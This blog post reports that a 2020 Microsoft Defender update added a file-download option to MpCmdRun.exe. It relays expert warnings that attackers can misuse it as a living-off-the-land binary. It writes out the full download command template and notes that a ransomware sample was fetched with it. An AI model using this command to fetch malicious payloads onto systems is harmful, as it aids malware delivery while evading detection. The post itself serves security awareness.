[English]Microsoft has added a way to download arbitrary files in Defender. However, this download feature causes more headaches than enthusiasm among security experts.
Advertising
I had read the reference to the new feature these days at deskmodder.de in the article Windows Defender (MpCmdRun.exe) als Download-Manager nutzen? Kein Problem. With the Defender update to version 4.18.2007.8-0 (source Will Dormann) there is a new feature in the MpCmdRun.exe. Hacker mohammadaskar2 found it by accident and calls it the Microsoft Malware Protection Command Line. You can use the command:
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe -DownloadFile -url <url> -path <local-path>
as an administrator, to download any file with Windows Defender. Microsoft described this in this support article published in mid-August 2020. Colleague Lawrence Abrams points out on Bleeping Computer that this is a a nice feature for malware writers, they have a new case where legitimate operating system files can be misused for malicious purposes.
The whole thing is called living-off-the-land binaries or LOLBINs. Abrams writes that the feature was introduced with the update to version 4.18.2007.9 or 4.18.2009.9. BleepingComputer was able to download the resources.exe file, the WastedLocker Ransomware example used in a recent Garmin attack.
Let's hope that Microsoft Defender will detect all malicious files downloaded with MpCmdRun.exe. The problem that other antivirus software disables Defender and is blind to this attack should be slowly defused. This is because Microsoft tries to protect Defender to be disabled in Windows (see Microsoft Defender can no longer be disabled under Windows 10). The case shows once again that such nice features can have their archilles heel.
Advertising
